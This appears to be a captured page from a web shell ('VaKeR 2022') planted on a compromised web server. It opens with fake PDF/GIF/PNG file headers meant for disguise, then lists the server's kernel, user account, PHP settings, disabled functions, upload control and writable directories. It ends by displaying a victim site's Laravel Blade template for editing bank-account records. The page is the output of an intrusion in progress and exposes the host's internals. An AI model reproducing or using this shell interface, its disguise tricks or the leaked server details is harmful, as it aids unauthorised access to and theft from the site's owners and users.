%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/admin1/resources/views/bank-account/ajax/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/admin1/resources/views/bank-account/ajax/edit.blade.php
<div class="row">
    <div class="col-sm-12">
        <x-form id="save-bankaccount-data-form" method="PUT">
            <div class="add-client bg-white rounded">
                <h4 class="mb-0 p-20 f-21 font-weight-normal text-capitalize border-bottom-grey">
                    @lang('modules.bankaccount.updateBankAccount')</h4>
                    <div class="row p-20">

                        <div class="col-md-12">
                            <div class="form-group">
                                <label class="f-14 text-dark-grey mb-12 w-100 mt-3" for="usr">@lang('modules.bankaccount.type')</label>
                                <div class="d-flex">
                                    <x-forms.radio fieldId="type-bank" class="type" :fieldLabel="__('modules.bankaccount.bank')" fieldValue="bank"
                                        fieldName="type" :checked="$bankAccount->type == 'bank'">
                                    </x-forms.radio>
                                    <x-forms.radio fieldId="type-cash" class="type" :fieldLabel="__('modules.bankaccount.cash')" fieldValue="cash"
                                        fieldName="type" :checked="$bankAccount->type == 'cash'">
                                    </x-forms.radio>

                                </div>
                            </div>
                        </div>

                        <div class="col-md-4 bank_name @if ($bankAccount->type == 'cash') d-none @endif">
                            <x-forms.text fieldId="bank_name" :fieldLabel="__('modules.bankaccount.bankName')"
                                fieldName="bank_name" fieldRequired="true"
                                :fieldPlaceholder="__('placeholders.bankaccount.bankName')" :fieldValue="$bankAccount->bank_name">
                            </x-forms.text>
                        </div>

                        <div class="col-md-4">
                            <x-forms.text fieldId="account_name" :fieldLabel="__('modules.bankaccount.accountName')"
                                fieldName="account_name" fieldRequired="true"
                                :fieldPlaceholder="__('placeholders.bankaccount.accountName')" :fieldValue="$bankAccount->account_name">
                            </x-forms.text>
                        </div>

                        <div class="col-md-4 accountNumber @if ($bankAccount->type == 'cash') d-none @endif">
                            <x-forms.text fieldId="account_number" :fieldLabel="__('modules.bankaccount.accountNumber')" fieldName="account_number" fieldRequired="true"
                                :fieldPlaceholder="__('placeholders.bankaccount.accountNumber')" :fieldValue="$bankAccount->account_number"></x-forms.text>
                        </div>

                        <div class="col-md-4 accountType @if ($bankAccount->type == 'cash') d-none @endif">
                            <x-forms.select fieldId="account_type" :fieldLabel="__('modules.bankaccount.accountType')" fieldName="account_type"
                                search="true">
                                <option value="saving" @if ($bankAccount->account_type == 'saving') selected @endif>@lang('modules.bankaccount.saving')</option>
                                <option value="current" @if ($bankAccount->account_type == 'current') selected @endif>@lang('modules.bankaccount.current')</option>
                                <option value="credit card" @if ($bankAccount->account_type == 'credit card') selected @endif>@lang('modules.bankaccount.creditCard')</option>
                                <option value="loan" @if ($bankAccount->account_type == 'loan') selected @endif>@lang('modules.bankaccount.loan')</option>
                                <option value="overdraft" @if ($bankAccount->account_type == 'overdraft') selected @endif>@lang('modules.bankaccount.overdraft')</option>
                            </x-forms.select>
                        </div>

                        <div class="col-md-4">
                            <x-forms.select fieldId="currency_id" :fieldLabel="__('app.currency')" fieldName="currency_id"
                                search="true" fieldRequired="true">
                                    <option value="">--</option>
                                    @foreach ($currencies as $currency)
                                        <option @if ($currency->id == $bankAccount->currency_id) selected @endif value="{{ $currency->id }}">
                                            {{ $currency->currency_code . ' (' . $currency->currency_symbol . ')' }}
                                        </option>
                                    @endforeach
                            </x-forms.select>
                        </div>

                        <div class="col-md-4">
                            <x-forms.tel fieldId="contact_number" :fieldLabel="__('modules.bankaccount.contactNumber')" fieldName="contact_number"
                               :fieldPlaceholder="__('placeholders.mobile')" :fieldValue="$bankAccount->contact_number" fieldRequired="true"></x-forms.tel>
                        </div>

                        <div class="col-md-4">
                            <x-forms.number fieldId="opening_balance" :fieldLabel="__('modules.bankaccount.openingBalance')" fieldName="opening_balance"
                                :fieldPlaceholder="__('placeholders.bankaccount.balance')" :fieldValue="$bankAccount->opening_balance" fieldRequired="true"></x-forms.number>
                        </div>

                        <div class="col-md-4">
                            <x-forms.select fieldId="status" :fieldLabel="__('app.status')" fieldName="status"
                            search="true" fieldRequired="true">
                                <option value="">--</option>
                                <option value="1" @if ($bankAccount->status == 1) selected @endif>@lang('app.active')</option>
                                <option value="0" @if ($bankAccount->status == 0) selected @endif>@lang('app.inactive')</option>
                        </x-forms.select>
                        </div>

                        <div class="col-md-12 bankLogo @if ($bankAccount->type == 'cash') d-none @endif">
                            <x-forms.file allowedFileExtensions="png jpg jpeg bmp" class="mr-0 mr-lg-2 mr-md-2"
                                :fieldLabel="__('modules.bankaccount.bankLogo')" fieldName="bank_logo"
                                fieldId="bank_logo" :fieldValue="($bankAccount->bank_logo ? $bankAccount->file_url : '')" :popover="__('modules.themeSettings.logoSize')">
                            </x-forms.file>
                        </div>
                    </div>

                <x-form-actions>
                    <x-forms.button-primary id="save-bankaccount" class="mr-3" icon="check">@lang('app.save')
                    </x-forms.button-primary>
                    <x-forms.button-cancel :link="route('bankaccounts.index')" class="border-0">@lang('app.cancel')
                    </x-forms.button-cancel>
                </x-form-actions>
            </div>
        </x-form>

    </div>
</div>

<script>
    $(document).ready(function() {

        $('#save-bankaccount').click(function() {
            const url = "{{ route('bankaccounts.update', [$bankAccount->id]) }}";

            $.easyAjax({
                url: url,
                container: '#save-bankaccount-data-form',
                type: "POST",
                disableButton: true,
                blockUI: true,
                buttonSelector: "#save-bankaccount",
                file: true,
                data: $('#save-bankaccount-data-form').serialize(),
                success: function(response) {
                    if (response.status == 'success') {
                        window.location.href = response.redirectUrl;
                    }
                }
            });
        });

        // show/hide bank accoun detail
       $('.type').change(function () {
            $('.bank_name').toggleClass('d-none');
            $('.accountNumber').toggleClass('d-none');
            $('.bankLogo').toggleClass('d-none');
            $('.accountType').toggleClass('d-none');
        });

        init(RIGHT_MODAL);
    });
</script>

VaKeR 2022